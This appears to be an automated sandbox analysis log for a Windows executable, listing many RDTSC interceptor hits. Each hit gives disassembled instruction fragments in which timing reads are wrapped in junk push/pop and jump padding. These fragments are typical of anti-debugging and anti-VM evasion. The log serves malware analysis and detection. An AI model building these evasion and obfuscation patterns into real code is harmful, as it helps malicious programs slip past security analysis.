Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 5ABAD3 second address: 5ABADC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 5ABADC second address: 5ABAE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 5ABAE0 second address: 5ABAF2 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007FA4C902634Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 5ABF35 second address: 5ABF3E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edi 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 5ABF3E second address: 5ABF4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 5ABF4D second address: 5ABF55 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 5ADBC1 second address: 5ADBD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 pop eax 0x00000008 jl 00007FA4C9026350h 0x0000000e push esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 5B2502 second address: 5B2511 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 5B2511 second address: 5B2515 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 5B265A second address: 5B2673 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FA4C9084156h 0x00000008 jnc 00007FA4C9084156h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push edx 0x00000011 js 00007FA4C9084156h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 5B2673 second address: 5B2678 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 5B2678 second address: 5B2682 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FA4C9084156h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 5B2B98 second address: 5B2B9E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 5B218B second address: 5B21AC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007FA4C9084167h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 5B21AC second address: 5B21BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4C902634Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 5B21BF second address: 5B21CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jbe 00007FA4C9084156h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 5B21CA second address: 5B21F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 ja 00007FA4C9026356h 0x0000000b jmp 00007FA4C9026350h 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 jc 00007FA4C902634Ch 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 5B2E34 second address: 5B2E3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 5B33A5 second address: 5B33B9 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FA4C9026348h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pushad 0x0000000e popad 0x0000000f push edi 0x00000010 pop edi 0x00000011 pop ebx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 5B33B9 second address: 5B33D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA4C9084169h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 5B33D7 second address: 5B33E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 5B9475 second address: 5B9492 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4C9084169h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 5B9492 second address: 5B949C instructions: 0x00000000 rdtsc 0x00000002 je 00007FA4C9026352h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 5B881A second address: 5B881E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 5B898A second address: 5B898E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 5B8C39 second address: 5B8C41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 5B8C41 second address: 5B8C49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 5B8C49 second address: 5B8C4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 5B8C4F second address: 5B8C5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FA4C9026346h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 5BF7A1 second address: 5BF7B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA4C908415Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 5BF7B2 second address: 5BF7B8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 5BF7B8 second address: 5BF7C4 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FA4C908415Eh 0x00000008 push edx 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 5BF47B second address: 5BF48F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA4C9026350h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 5C2AEA second address: 5C2B06 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4C9084168h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 5C26D0 second address: 5C26E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 js 00007FA4C9026370h 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 5C26E0 second address: 5C26EA instructions: 0x00000000 rdtsc 0x00000002 jg 00007FA4C9084156h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 5C857E second address: 5C8596 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA4C9026352h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 5C8891 second address: 5C889B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 5C889B second address: 5C88A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 5C8A1E second address: 5C8A22 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 579D7C second address: 579D80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 579ECA second address: 579F06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 nop 0x00000006 mov dword ptr [ebp+122D31E1h], eax 0x0000000c mov dword ptr [ebp+1247979Bh], edi 0x00000012 push 0000001Eh 0x00000014 push 00000000h 0x00000016 push ebp 0x00000017 call 00007FA4C9084158h 0x0000001c pop ebp 0x0000001d mov dword ptr [esp+04h], ebp 0x00000021 add dword ptr [esp+04h], 00000016h 0x00000029 inc ebp 0x0000002a push ebp 0x0000002b ret 0x0000002c pop ebp 0x0000002d ret 0x0000002e mov cx, 5F00h 0x00000032 push eax 0x00000033 pushad 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 popad 0x00000038 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 5C8CE5 second address: 5C8D16 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4C9026353h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c jnl 00007FA4C9026346h 0x00000012 pop ecx 0x00000013 jl 00007FA4C9026348h 0x00000019 push eax 0x0000001a pop eax 0x0000001b js 00007FA4C902634Ch 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 5CD1AD second address: 5CD1C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA4C9084161h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 5CD1C4 second address: 5CD1C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 5CD1C8 second address: 5CD212 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4C9084160h 0x00000007 jmp 00007FA4C908415Eh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e js 00007FA4C9084162h 0x00000014 pop edx 0x00000015 pop eax 0x00000016 pushad 0x00000017 jmp 00007FA4C908415Dh 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 5CD212 second address: 5CD216 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 5CD384 second address: 5CD3A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FA4C9084169h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 5CD3A2 second address: 5CD3B7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007FA4C9026350h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 5CD4ED second address: 5CD509 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jg 00007FA4C908415Ah 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FA4C908415Bh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 5CD509 second address: 5CD50E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 5CD7B3 second address: 5CD7C7 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jnl 00007FA4C9084156h 0x00000009 pushad 0x0000000a popad 0x0000000b pop edx 0x0000000c jbe 00007FA4C908415Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 538D96 second address: 538D9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 538D9A second address: 538D9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 538D9E second address: 538DAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 5D2B7A second address: 5D2BA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 popad 0x00000009 jo 00007FA4C9084164h 0x0000000f jmp 00007FA4C908415Eh 0x00000014 jmp 00007FA4C908415Ah 0x00000019 push ebx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 5DBBE3 second address: 5DBC41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FA4C902634Dh 0x0000000b jmp 00007FA4C9026355h 0x00000010 jg 00007FA4C9026346h 0x00000016 jmp 00007FA4C9026352h 0x0000001b popad 0x0000001c pop edi 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FA4C9026357h 0x00000024 push edi 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 5DBC41 second address: 5DBC48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 5DBC48 second address: 5DBC4F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 533E30 second address: 533E6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA4C9084163h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jg 00007FA4C9084166h 0x00000012 push eax 0x00000013 jmp 00007FA4C908415Ch 0x00000018 pop eax 0x00000019 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 5D9E49 second address: 5D9E4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 5D9E4D second address: 5D9E65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007FA4C908415Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 push esi 0x00000011 pop esi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 5D9E65 second address: 5D9E7A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4C9026351h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 5D9E7A second address: 5D9E86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 5DA030 second address: 5DA051 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnl 00007FA4C902635Ch 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 5DA051 second address: 5DA065 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4C908415Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 ja 00007FA4C9084156h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 5DA8E5 second address: 5DA8EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FA4C9026346h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 5DB5A9 second address: 5DB5D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007FA4C9084156h 0x00000009 jmp 00007FA4C9084168h 0x0000000e jmp 00007FA4C908415Dh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 5DB8E5 second address: 5DB914 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jnc 00007FA4C9026346h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d jmp 00007FA4C9026354h 0x00000012 push eax 0x00000013 pop eax 0x00000014 pop ebx 0x00000015 pushad 0x00000016 jg 00007FA4C9026346h 0x0000001c push ecx 0x0000001d pop ecx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 5E3D2E second address: 5E3D34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 5E3D34 second address: 5E3D53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA4C902634Dh 0x00000009 jne 00007FA4C9026348h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 5E3D53 second address: 5E3D57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 5E444F second address: 5E4453 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 5E4607 second address: 5E4615 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FA4C9084158h 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 5E4615 second address: 5E461F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FA4C9026346h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 5EC82D second address: 5EC831 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 5EC831 second address: 5EC835 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 5EC97C second address: 5EC982 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 5EC982 second address: 5EC986 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 5EC986 second address: 5EC9A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4C9084168h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 5EC9A2 second address: 5EC9C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jmp 00007FA4C9026357h 0x0000000c pop edi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 5EC9C1 second address: 5EC9CE instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 5EC9CE second address: 5EC9D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 5EC9D5 second address: 5EC9EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA4C9084163h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 5EC9EE second address: 5EC9F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 5EC9F2 second address: 5EC9FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 5ECCD6 second address: 5ECCDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 5ECCDD second address: 5ECCEA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007FA4C9084156h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
